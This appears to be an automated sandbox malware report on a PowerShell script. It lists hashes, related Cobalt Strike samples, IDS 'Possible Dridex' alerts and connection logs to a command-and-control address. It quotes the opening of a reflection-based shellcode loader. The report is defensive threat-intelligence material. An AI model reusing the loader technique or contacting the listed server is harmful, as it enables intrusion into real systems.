                                                                                    • 20.25.126.96
                                                                                    J4o8OaYTEF.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 20.25.126.96
                                                                                    rSJj3YS2J1.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 20.25.126.96
                                                                                    HvREKnuoh7.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 20.25.126.96
                                                                                    foEIrd5DlF.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 20.25.126.96
                                                                                    VBqmdl6ttr.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 20.25.126.96
                                                                                    IhmhW5dP4s.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 20.25.126.96
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):9434
                                                                                    Entropy (8bit):4.928515784730612
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                    MD5:D3594118838EF8580975DDA877E44DEB
                                                                                    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6224
                                                                                    Entropy (8bit):3.725266633029642
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:YaH6p+3CnWTXkvhkvCCtG7p0Y6a+HN7p0Y6amHM:YG1PG7pC7ph
                                                                                    MD5:3A239873E99A39749E0F3496D0631E0C
                                                                                    SHA1:73D638C0FF7EB140E21BECD87DEC5E9C4CE5C5BF
                                                                                    SHA-256:63265127B5A044CD0F24B30773B2E726459C28BC2F6848D11650294333CBA89E
                                                                                    SHA-512:D0B06AAC6F4839871D55F459B56CE68E1BB2AAC330225CF4A2CCB0539D9495CD9A7804E690E90FB56BBCD8C26BBAF8DAEA15628847EEC275A402086607863ABA
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...................................FL..................F.".. ...J.S.....TF.'..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......B.'...._F.'......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2ZYm]...........................^.A.p.p.D.a.t.a...B.V.1.....ZYk]..Roaming.@......EW<2ZYk]..../.......................T.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2ZYh]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2ZYh]....2.......................r.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2ZYh]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2ZYh]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2ZYo]....u...........
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6224
                                                                                    Entropy (8bit):3.725266633029642
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:YaH6p+3CnWTXkvhkvCCtG7p0Y6a+HN7p0Y6amHM:YG1PG7pC7ph
                                                                                    MD5:3A239873E99A39749E0F3496D0631E0C
                                                                                    SHA1:73D638C0FF7EB140E21BECD87DEC5E9C4CE5C5BF
                                                                                    SHA-256:63265127B5A044CD0F24B30773B2E726459C28BC2F6848D11650294333CBA89E
                                                                                    SHA-512:D0B06AAC6F4839871D55F459B56CE68E1BB2AAC330225CF4A2CCB0539D9495CD9A7804E690E90FB56BBCD8C26BBAF8DAEA15628847EEC275A402086607863ABA
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...................................FL..................F.".. ...J.S.....TF.'..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......B.'...._F.'......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2ZYm]...........................^.A.p.p.D.a.t.a...B.V.1.....ZYk]..Roaming.@......EW<2ZYk]..../.......................T.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2ZYh]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2ZYh]....2.......................r.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2ZYh]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2ZYh]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2ZYo]....u...........
                                                                                    File type:ASCII text, with very long lines (63904), with CRLF line terminators
                                                                                    Entropy (8bit):5.736611691300354
                                                                                    TrID:
                                                                                      File name:oEFrY6Xcyl.ps1
                                                                                      File size:411'912 bytes
                                                                                      MD5:bcb86f9d27c31bae83ab47c9f970ca98
                                                                                      SHA1:2828cf58872227589f46595101d6129ced8334ab
                                                                                      SHA256:225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2
                                                                                      SHA512:6bdea040a28f1657d8f5ef2f356f623cc972d62bd0362a9e32efc35215a93c59224e940933106da6672bfb5f54f1ba2a5ba18302619781e5a280a3967b1a142e
                                                                                      SSDEEP:6144:GgCjcsyEG7zWks4bOXwllEz1/IxinHDwAJ5cENmTqo84247UdndFmkgC56LsQ2lU:GgC4sdGvWAqXqcVIonHFJqEs8f7rL8
                                                                                      TLSH:E0947C473F59A9AED612F122EA2EB0C235E4B52E91A58AC4B7F1D4F514F802134F43E7
                                                                                      File Content Preview:Set-StrictMode -Version 2....function test {...Param ($var_module, $var_procedure).....$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
                                                                                      Icon Hash:3270d6baae77db44
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-10-26T13:43:35.032958+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64971020.25.126.96443TCP
                                                                                      2024-10-26T13:43:37.982753+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64971420.25.126.96443TCP
                                                                                      2024-10-26T13:43:40.677125+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972820.25.126.96443TCP
                                                                                      2024-10-26T13:43:43.356490+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64975020.25.126.96443TCP
                                                                                      2024-10-26T13:43:46.008163+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64976420.25.126.96443TCP
                                                                                      2024-10-26T13:43:48.722575+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64978320.25.126.96443TCP
                                                                                      2024-10-26T13:43:51.454786+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64979320.25.126.96443TCP
                                                                                      2024-10-26T13:43:54.168915+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64980120.25.126.96443TCP
                                                                                      2024-10-26T13:43:56.852102+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64980820.25.126.96443TCP
                                                                                      2024-10-26T13:43:59.563189+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64981420.25.126.96443TCP
                                                                                      2024-10-26T13:44:02.219634+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64982020.25.126.96443TCP
                                                                                      2024-10-26T13:44:04.941642+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64982620.25.126.96443TCP
                                                                                      2024-10-26T13:44:07.688886+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64983220.25.126.96443TCP
                                                                                      2024-10-26T13:44:10.361019+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64984720.25.126.96443TCP
                                                                                      2024-10-26T13:44:13.061690+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64986220.25.126.96443TCP
                                                                                      2024-10-26T13:44:15.778625+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64987720.25.126.96443TCP
                                                                                      2024-10-26T13:44:18.484894+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64989720.25.126.96443TCP
                                                                                      2024-10-26T13:44:21.179909+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64991520.25.126.96443TCP
                                                                                      2024-10-26T13:44:23.895011+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64993320.25.126.96443TCP
                                                                                      2024-10-26T13:44:26.612940+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64995020.25.126.96443TCP
                                                                                      2024-10-26T13:44:29.318794+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64996520.25.126.96443TCP
                                                                                      2024-10-26T13:44:32.042278+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64998020.25.126.96443TCP
                                                                                      2024-10-26T13:44:34.763942+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999520.25.126.96443TCP
                                                                                      2024-10-26T13:44:37.488476+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65001020.25.126.96443TCP
                                                                                      2024-10-26T13:44:40.165251+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65002620.25.126.96443TCP
                                                                                      2024-10-26T13:44:42.835987+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65004520.25.126.96443TCP
                                                                                      2024-10-26T13:44:45.642472+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65006220.25.126.96443TCP
                                                                                      2024-10-26T13:44:48.416246+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65006520.25.126.96443TCP
                                                                                      2024-10-26T13:44:51.344997+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65006820.25.126.96443TCP
                                                                                      2024-10-26T13:44:54.060795+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65007120.25.126.96443TCP
                                                                                      2024-10-26T13:44:56.709003+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65007420.25.126.96443TCP
                                                                                      2024-10-26T13:44:59.449017+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65007720.25.126.96443TCP
                                                                                      2024-10-26T13:45:02.174901+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65008020.25.126.96443TCP
                                                                                      2024-10-26T13:45:04.888705+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65008320.25.126.96443TCP
                                                                                      2024-10-26T13:45:07.603556+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65008620.25.126.96443TCP
                                                                                      2024-10-26T13:45:10.283030+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65008920.25.126.96443TCP
                                                                                      2024-10-26T13:45:12.989545+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65009320.25.126.96443TCP
                                                                                      2024-10-26T13:45:15.686450+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65009620.25.126.96443TCP
                                                                                      2024-10-26T13:45:18.378697+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65009920.25.126.96443TCP
                                                                                      2024-10-26T13:45:22.589406+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65010220.25.126.96443TCP
                                                                                      2024-10-26T13:45:25.255307+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65010520.25.126.96443TCP
                                                                                      2024-10-26T13:45:27.954262+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65010820.25.126.96443TCP
                                                                                      2024-10-26T13:45:30.654752+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65011120.25.126.96443TCP
                                                                                      2024-10-26T13:45:33.419957+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65011420.25.126.96443TCP
                                                                                      2024-10-26T13:45:36.097457+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65011720.25.126.96443TCP
                                                                                      2024-10-26T13:45:38.808343+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65012020.25.126.96443TCP
                                                                                      2024-10-26T13:45:41.657149+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65012320.25.126.96443TCP
                                                                                      2024-10-26T13:45:44.352878+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65012620.25.126.96443TCP
                                                                                      2024-10-26T13:45:47.115614+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65013020.25.126.96443TCP
                                                                                      2024-10-26T13:45:49.806539+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65013320.25.126.96443TCP
                                                                                      2024-10-26T13:45:52.519389+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65013620.25.126.96443TCP
                                                                                      2024-10-26T13:45:55.290464+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65013920.25.126.96443TCP
                                                                                      2024-10-26T13:45:57.979184+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65014220.25.126.96443TCP
                                                                                      2024-10-26T13:46:00.683469+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65014520.25.126.96443TCP
                                                                                      2024-10-26T13:46:03.393152+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65014820.25.126.96443TCP
                                                                                      2024-10-26T13:46:06.059822+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65015120.25.126.96443TCP
                                                                                      2024-10-26T13:46:08.751972+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65015420.25.126.96443TCP
                                                                                      2024-10-26T13:46:11.481153+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65015720.25.126.96443TCP
                                                                                      2024-10-26T13:46:14.188731+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65016020.25.126.96443TCP
                                                                                      2024-10-26T13:46:16.858261+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65016320.25.126.96443TCP
                                                                                      2024-10-26T13:46:20.646912+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65016620.25.126.96443TCP
                                                                                      2024-10-26T13:46:24.305152+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65016920.25.126.96443TCP
                                                                                      2024-10-26T13:46:26.981500+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65017220.25.126.96443TCP
                                                                                      2024-10-26T13:46:29.690918+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65017520.25.126.96443TCP
                                                                                      2024-10-26T13:46:32.386337+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65017820.25.126.96443TCP
                                                                                      2024-10-26T13:46:35.045259+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65018120.25.126.96443TCP
                                                                                      2024-10-26T13:46:37.861128+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65018420.25.126.96443TCP
                                                                                      2024-10-26T13:46:40.558417+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65018720.25.126.96443TCP
                                                                                      2024-10-26T13:46:43.273237+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65019020.25.126.96443TCP
                                                                                      2024-10-26T13:46:46.014854+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65019320.25.126.96443TCP
                                                                                      2024-10-26T13:46:48.736786+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65019620.25.126.96443TCP
                                                                                      2024-10-26T13:46:51.533636+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65019920.25.126.96443TCP
                                                                                      2024-10-26T13:46:54.273511+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65020220.25.126.96443TCP
                                                                                      2024-10-26T13:46:57.003778+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65020520.25.126.96443TCP
                                                                                      2024-10-26T13:46:59.748162+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65020820.25.126.96443TCP
                                                                                      2024-10-26T13:47:02.448936+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65021120.25.126.96443TCP
                                                                                      2024-10-26T13:47:05.148131+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65021420.25.126.96443TCP
                                                                                      2024-10-26T13:47:07.832941+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65021820.25.126.96443TCP
                                                                                      2024-10-26T13:47:10.544254+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65022120.25.126.96443TCP
                                                                                      2024-10-26T13:47:13.235791+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65022420.25.126.96443TCP
                                                                                      2024-10-26T13:47:15.894331+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65022720.25.126.96443TCP
                                                                                      2024-10-26T13:47:18.756780+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65023020.25.126.96443TCP
                                                                                      2024-10-26T13:47:21.430912+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65023320.25.126.96443TCP
                                                                                      2024-10-26T13:47:24.211500+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65023620.25.126.96443TCP
                                                                                      2024-10-26T13:47:26.900568+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65023920.25.126.96443TCP
                                                                                      2024-10-26T13:47:29.616847+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65024220.25.126.96443TCP
                                                                                      2024-10-26T13:47:32.345456+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65024520.25.126.96443TCP
                                                                                      2024-10-26T13:47:35.043396+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65024820.25.126.96443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 26, 2024 13:43:33.728765011 CEST49710443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:33.728822947 CEST4434971020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:33.728903055 CEST49710443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:33.733077049 CEST49710443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:33.733093023 CEST4434971020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:35.032807112 CEST4434971020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:35.032958031 CEST49710443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:35.033072948 CEST49710443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:35.033093929 CEST4434971020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:35.033879995 CEST49711443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:35.033929110 CEST4434971120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:35.034006119 CEST49711443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:35.034285069 CEST49711443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:35.034296036 CEST4434971120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:36.563503981 CEST4434971120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:36.563628912 CEST49711443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.563757896 CEST49711443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.563779116 CEST4434971120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:36.564646006 CEST49713443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.564688921 CEST4434971320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:36.564775944 CEST49713443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.564835072 CEST49713443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.564866066 CEST4434971320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:36.564924002 CEST49713443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.680486917 CEST49714443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.680533886 CEST4434971420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:36.680610895 CEST49714443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.681127071 CEST49714443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:36.681138039 CEST4434971420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:37.982615948 CEST4434971420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:37.982753038 CEST49714443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:37.983222008 CEST49714443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:37.983247995 CEST4434971420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:37.983798027 CEST49720443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:37.983840942 CEST4434972020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:37.983922005 CEST49720443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:37.984185934 CEST49720443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:37.984199047 CEST4434972020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:39.271859884 CEST4434972020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:39.271931887 CEST49720443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.271996021 CEST49720443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.272011042 CEST4434972020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:39.272530079 CEST49726443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.272571087 CEST4434972620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:39.272753000 CEST49726443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.272753000 CEST49726443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.272855043 CEST4434972620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:39.272907019 CEST49726443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.383229017 CEST49728443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.383269072 CEST4434972820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:39.383358002 CEST49728443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.383661032 CEST49728443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:39.383675098 CEST4434972820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:40.677038908 CEST4434972820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:40.677124977 CEST49728443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:40.677222013 CEST49728443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:40.677242994 CEST4434972820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:40.677917004 CEST49739443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:40.677983999 CEST4434973920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:40.678111076 CEST49739443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:40.678459883 CEST49739443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:40.678476095 CEST4434973920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:41.965049028 CEST4434973920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:41.965189934 CEST49739443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:41.965264082 CEST49739443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:41.965291977 CEST4434973920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:41.965981960 CEST49745443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:41.966027021 CEST4434974520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:41.966104031 CEST49745443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:41.966202974 CEST49745443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:41.966234922 CEST4434974520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:41.966279984 CEST49745443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:42.074121952 CEST49750443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:42.074134111 CEST4434975020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:43:42.074198961 CEST49750443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:42.074387074 CEST49750443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:43:42.074394941 CEST4434975020.25.126.96192.168.2.6
